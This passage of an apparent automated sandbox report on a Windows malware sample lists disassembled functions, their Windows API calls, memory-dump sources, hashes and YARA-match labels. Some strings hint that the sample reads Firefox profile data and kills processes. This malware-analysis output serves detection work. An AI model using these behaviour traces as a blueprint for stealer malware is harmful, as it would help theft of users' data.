                                        • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                        • Instruction Fuzzy Hash: F491E2729203189BCB58FBE4DD65DEEB33AAF64300F504179E60A66194EF346B48CF61
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0085BE78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                        • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                        • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 01bdb4945d9932d9b7c106efb241becc08e4881024c85f53ba91e5866b20e1d2
                                        • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                        • Opcode Fuzzy Hash: 01bdb4945d9932d9b7c106efb241becc08e4881024c85f53ba91e5866b20e1d2
                                        • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                          • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 022F8DED
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022EDA68
                                        • lstrlen.KERNEL32(00000000), ref: 022EDC06
                                        • lstrlen.KERNEL32(00000000), ref: 022EDC1A
                                        • DeleteFileA.KERNEL32(00000000), ref: 022EDC99
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                        • Instruction ID: e51021cc05e9b01495d3c9b4beddaf08489f87548c774fb85cca9c9e29f9c888
                                        • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                        • Instruction Fuzzy Hash: BB81D2729203149BCB48FBE4DD65DEEB33AAF64300F50457DE60A66194EF346A48CF61
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0085BE78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                        • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                        • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                        • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 7000f1922039b0047d5602b790d08593dfcb75332a51e3221e663014c389c0ab
                                        • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                        • Opcode Fuzzy Hash: 7000f1922039b0047d5602b790d08593dfcb75332a51e3221e663014c389c0ab
                                        • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                        APIs
                                          • Part of subcall function 004075D0: lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                          • Part of subcall function 004075D0: lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                          • Part of subcall function 004075D0: lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                          • Part of subcall function 004075D0: lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                          • Part of subcall function 004075D0: lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                          • Part of subcall function 004075D0: lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                          • Part of subcall function 004075D0: lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                          • Part of subcall function 004075D0: task.LIBCPMTD ref: 004076FB
                                        • lstrcatA.KERNEL32(?,00861B48,?,00000104), ref: 00407E0B
                                        • lstrcatA.KERNEL32(?,00860690), ref: 00407E1E
                                        • lstrlenA.KERNEL32(00000000), ref: 00407E2B
                                        • lstrlenA.KERNEL32(00000000), ref: 00407E3B
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpytask
                                        • String ID:
                                        • API String ID: 492053522-0
                                        • Opcode ID: 89f20ee17a6c017302cb1c9915d34732c46b9f0c40d1fd6f2d41be0bcd1eb2cf
                                        • Instruction ID: e62c7793127a728513c0cf5ea8340a7e423dc1602524cf7baccfde5cd356d132
                                        • Opcode Fuzzy Hash: 89f20ee17a6c017302cb1c9915d34732c46b9f0c40d1fd6f2d41be0bcd1eb2cf
                                        • Instruction Fuzzy Hash: DF514AB5D5034466DB25E7A1CC82EEE723C6B44704F405A9DB31C660C1EE78E7858B5A
                                        APIs
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                        • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        • Opcode ID: d1ae7793b06836315990e45cb1f02f8af9c7ddc01b71bb5253175341727b094c
                                        • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                        • Opcode Fuzzy Hash: d1ae7793b06836315990e45cb1f02f8af9c7ddc01b71bb5253175341727b094c
                                        • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                        APIs
                                        • __scrt_initialize_crt.LIBCMT ref: 0230E562
                                          • Part of subcall function 0230E9F7: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 0230EA19
                                        • __scrt_acquire_startup_lock.LIBCMT ref: 0230E577
                                        • __scrt_release_startup_lock.LIBCMT ref: 0230E5E5
                                        • __scrt_get_show_window_mode.LIBCMT ref: 0230E638
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                        • String ID:
                                        • API String ID: 1452418845-0
                                        • Opcode ID: f433eebb87c59b1dcdfb599205d54c5a618b0fa7a877a3c0b7a4b21b94478ba7
                                        • Instruction ID: 9d2fa56b21d81fb2aedce4b4e8a50d0a38a7139be85b43ce174226befc8c3cc6
                                        • Opcode Fuzzy Hash: f433eebb87c59b1dcdfb599205d54c5a618b0fa7a877a3c0b7a4b21b94478ba7
                                        • Instruction Fuzzy Hash: 1A31A3207146488FEB28FBB8D4F47A933D3EB59304F444D698487C72E2DF288806CA72
                                        APIs
                                        • memset.MSVCRT ref: 022F9752
                                          • Part of subcall function 022F8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,022F9785,00000000), ref: 022F8FC2
                                          • Part of subcall function 022F8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 022F8FC9
                                          • Part of subcall function 022F8FB7: wsprintfW.USER32 ref: 022F8FDF
                                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 022F9812
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 022F9830
                                        • CloseHandle.KERNEL32(00000000), ref: 022F983D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                        • String ID:
                                        • API String ID: 3729781310-0
                                        • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                        • Instruction ID: 40eaccba01de93cecdb031b94f83505154004dcf8ee5387ef2e94164c31c680f
                                        • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                        • Instruction Fuzzy Hash: 663148B5E10348EFDB54DFE0CD48BEDB779EB45300F504428E606AA288DB786A84CF52
                                        APIs
                                        • memset.MSVCRT ref: 004194EB
                                          • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                          • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                          • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                        • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                        • String ID:
                                        • API String ID: 396451647-0
                                        • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                        • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                        • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                        • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 022F8931
                                        • Process32First.KERNEL32(?,00000128), ref: 022F8945
                                        • Process32Next.KERNEL32(?,00000128), ref: 022F895A
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                        • CloseHandle.KERNEL32(?), ref: 022F89C8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                        • Instruction ID: 538e5d387702898786944a35597ff044d29542a62b893d1b8f5695b26c8807ea
                                        • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                        • Instruction Fuzzy Hash: 9A318D71911318ABCB64DF94CD44FEEF379EB45700F1041A9E60EA22A4DB346E88CF91
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                        • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                        • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • CloseHandle.KERNEL32(?), ref: 00418761
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: 3e46cf09bd1832df3ddc3941a438dd18048b5db8105147bbeddfe5f0d6b87e37
                                        • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                        • Opcode Fuzzy Hash: 3e46cf09bd1832df3ddc3941a438dd18048b5db8105147bbeddfe5f0d6b87e37
                                        • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                        APIs
                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                        • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                        • lstrcatA.KERNEL32(?,00859E78), ref: 00414FAB
                                        • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                        • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                        • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                        • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                        • wsprintfA.USER32 ref: 00418850
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 2716131235-2206825331
                                        • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                        • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                        • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                        • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcessstrtok_s
                                        • String ID:
                                        • API String ID: 3407564107-0
                                        • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                        • Instruction ID: 4c607d35608c189c973395c563414f92be7623a87be4eb9aeec53e3cd5ce4e36
                                        • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                        • Instruction Fuzzy Hash: 67115B75910209EFCB04DFE4D958AEDBB75FF04705F408469E90967250E7705B14CF65
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 022F7C17
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022F7C1E
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 022F7C2B
                                        • wsprintfA.USER32 ref: 022F7C5A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                        • Instruction ID: 55b915544e306526a7f24f824c9259a5c326e43306ee120ffebf3e302949d2a3
                                        • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                        • Instruction Fuzzy Hash: 461127B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280D2795940CBB1
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                        • wsprintfA.USER32 ref: 004179F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
